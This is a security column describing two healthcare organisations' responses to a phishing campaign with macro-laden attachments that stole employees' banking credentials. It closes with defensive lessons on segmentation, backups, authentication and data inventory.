Security Experts:

Tales From the SOC: Healthcare Edition

Over the past ten years, I have led and supported incident response engagements across nearly every industry vertical and trained security teams of all sizes to develop and improve their detection and response capabilities. One of the first areas addressed in these trainings is understanding whether an attack is targeted or opportunistic. Security teams who begin this kind of introspection typically come with notions of their attack landscape, which may contain a mixture of targeted and opportunistic threats. They may be biased toward a targeted threat because they consider it more dangerous, but it is safe to say that identifying the nature of an attack early on can help to determine the degree of the threat and the resources you will initially allocate in response. 

A recent series of events with two customers that are diametrically opposed in size but share a common vertical brought this topic to the forefront. In this Tale from the SOC: healthcare edition, I will share how these organizations used a trail of digital evidence to identify the type of attack they were experiencing and developed a remediation strategy. I will also share the lessons learned that can be applied to organizations of every size and industry.

Established industry, modern threats

The healthcare sector has typically been one of the last industries to adopt new cybersecurity technologies and has subsequently seen the risks from malware and cyber attacks rise considerably over the past few years. On one level, this is understandable. Healthcare is an established industry that moves much more slowly than the threat landscape. These organizations often opt for making investments in IT infrastructure to reduce costs and improve patient care, instead of investments in cybersecurity that support risk management initiatives but generally lack immediate ROI. 

Despite the weekly headlines proclaiming healthcare’s latest victim of a cyber attack and a spotlight focused on potential impacts to patient safety, too few healthcare organizations are taking proactive measures to meaningfully reduce their vulnerability. But, why? 

While many organizations may perceive a threat differently depending on whether it is the target or its consumers, healthcare organizations generally favor solutions that have the least impact on their consumers, which usually means a high-risk security profile and often undersized security and IT capability.

Healthcare’s rigid and outdated computing environments aren't keeping pace. The organizations making headlines were targeted and compromised because they could be, because the right investments in people and technology were not made, and because shareholder values have to go up predictably or corners have to be cut. I believe it’s imperative that we reset that narrative: it's never too late, you can learn from these cautionary tales, this is a call to action. And - if no efforts are made to correct the course - that worst case loss-of-life situation gets closer and closer to being a certainty.

A different twist: malware focused on employees, not patients

Research from our network telemetry showed that malware targeting end-of-life healthcare organizations, such as hospice and nursing home providers, was on the rise. You might expect this kind of threat was after patient data, but all evidence indicated that they were targeting employees of these healthcare systems. The malware being deployed waited for people to log into personal banking accounts, and then stole their credentials. Executives at both of these organizations were initially skeptical of the results, as history would indicate that their patients, not employees, would be a more attractive target. We worked with our customers, communicating a summary of technical and operational details about the threat targeting them. 

We saw a common phishing lure and social engineering approach that tied these attacks to hundreds of others - all of them focused on organizations in the healthcare vertical. While not all of these targets were our customers, open source intelligence enabled us to see that many healthcare organizations had been phished with the same lure. That perspective helped our customers in their decision-making process, indicating that this attack may not have been targeted but could belong to a mature threat group. 

For security teams, facts are expensive and some types are very rare. Anything you can establish as fact in the earliest stages of an attack is valuable. In this case, we understood the scale of the campaign and were confident it wasn't targeted - and that bought time for more detailed analysis of the threat and a much better understanding of how prepared these two different customers would be if it hadn't been intercepted so early.

One of the details we were interested in - a common investigative question - was when the initial compromise was observed. Having this knowledge is important and may be lost if you don't have the luxury of early detection - most notably the facts you lose when a system is immediately rebuilt and restored to functionality. A "scorched earth" strategy can be effective, but it isn't one that guarantees many answers.

Being confident that this threat wasn't targeted didn't mean it couldn't be painful - consider if the payload had deployed ransomware or a destructive malware sample instead of trying to steal employee banking credentials. Early detection created opportunities for us, one of which enabled us to contain this infection. Even an opportunistic attacker may decide a firefight for the environment is worthwhile if you give them the option.

Flat networks and phished emails

Let’s go back to our healthcare customers. One was a multi-state healthcare provider with tens of thousands of endpoints and had invested in a segmented network, but the smaller, regional healthcare provider had a flat network of a few thousand endpoints. Now, you may think that having a flat network is unusual, but we see them all the time in our deployments. We have seen flat topologies on networks with hundreds of thousands of nodes, in some of the largest global multinational companies. I even recall one customer who had added every domain user to the local administrators group on every endpoint - effectively making every single user the equivalent to domain admin. 

I point this out because perfect security is impossible and a wide range of factors determine what environmental configurations are possible. Even the most secure computing environments have weak points, and you can guess that an adversary will figure this out pretty quickly, and use it to their advantage to move around the network with ease once they can find a single compromised account.

With both of these healthcare providers, we discovered that the source of the intrusion was a phishing email with an infected Office macro attachment. This is a typical entry point, and we often advise clients that the only way to mediate these phishing attempts is through a layered approach, such as disabling macros in internet-sourced documents, using pdf and other document sandboxes, using a click-through web proxy, restricting admin privileges, and adopting a trusted DNS policy, among others. 

For healthcare organizations and others providing critical life-saving services, the decision to apply controls to Office documents must be carefully considered, because often legitimate applications can be prevented from running that may impact patient care. Healthcare professionals are understandably focused on having unfettered access to systems 24x7, and blocking a single Excel macro could pose a serious issue. 

Why fighting false positives is important

Healthcare organizations also face difficult decisions around security and IT expenses, which might mean undersized or under-equipped teams. This is one of the most common scenarios I've encountered, and those smaller teams can be quickly overwhelmed by alerts or events from security products. Alert fatigue is a real phenomenon; one that small teams may be disproportionately ill-equipped to overcome.

One of the most common product features that helps with noise management is whitelisting, with varying degrees of detail. For teams with more work than time, whitelisting can be unintentionally abused and may prevent you from detecting something malicious. It's been on the rise for many years, but the phenomenon of adversaries using native operating system features has complicated point-solutions like whitelisting. Utilities that ship with the operating system, signed and verified, can be very dangerous to whitelist if they are frequently abused and blacklisting them could impact legitimate business operations. These capabilities should be used sparingly and take into account the likelihood of creating a blind spot.

Let me address this issue. We know that any kind of classification schema can be fallible. One challenge is that the training data used for any schema has to have the right mix of content to produce the right results of which actions are allowed and which ones aren’t. You don’t only want to look at the raw numbers or metadata, but include a mixture of behaviors and outcomes that drive your schemas. Without this contextual variety, your results will include a lot of blind spots and you won’t be able to make a judgement as to whether something is benign or malicious. 

This gets to the heart of things in terms of the efficacy of your protections. Many times, we see adversaries use something benign, like a Windows script, that has unexpected outcomes to try to fool your defensive systems. You have to account for all the different states, including false positives, false negatives, and true positives. Those three metrics are the only way to quantify how good a product is at finding bad things across your infrastructure. This difference in language becomes very important. 

Some endpoint protection vendors report higher levels of false positives in their reports. This can be a distraction, and tie up IT analysts as they chase false leads that consume a lot of time and energy. 

Lessons learned

Here are some lessons learned:  

● First, network segmentation is one of the most effective ways to limit the scope and impact of an attack. If you are unable to segment your enterprise for some reason, you should consider other security controls that specifically address privilege escalation, credential access and lateral movement techniques. If you can't do those things, consider turning on the firewall - one of the most common features we see disabled and one of the most effective when properly configured.

● Test your backups to make sure that you are actually capturing the most current data, and then make sure you stage periodic recovery drills so you can hone your response workflows and have the right orchestration steps to bring your systems back online in the appropriate order. If you don't regularly practice critical enterprise processes like disaster recovery and incident response, you're not ready for the real thing. Ultimately when go-time arrives you make mistakes - and some mistakes are more costly than others.

● Secure your employees with better authentication methods. Start with a least privilege approach and add layers of security for your most critical accounts. For systems administrators, Privileged Access Workstations (PAWs) are one recommendation, while requiring multifactor for all accounts with remote access might be another. Consider additional layers for accounts that have direct or indirect access to regulated data, such as personal information. 

● Know the location of business-critical data and applications. Security teams should be easily able to determine whether a system supports one or both. Additionally, document the systems and users with access to sensitive information. Audit endpoints for spillage and consider policies that define safe handling procedures.

view counter
Devon is a principal researcher at Endgame, focusing on detection and response technologies. Formerly a Mandiant incident response and remediation lead, Devon has over 6 years of experience in security professional services where he has worked with clients in a nearly every conceivable industry. He has significant experience helping Fortune 500 organizations with the detection, response, and containment of advanced targeted threat actors and has led large-scale network and application architecture reviews, post-incident strategic planning, and regulatory gap assessments. He has delivered a range of technical presentations for security conferences, industry organizations, and the United States Department of Defense. Prior to his career in information security, Devon spent 15 years in operations roles as a system administrator and network engineer.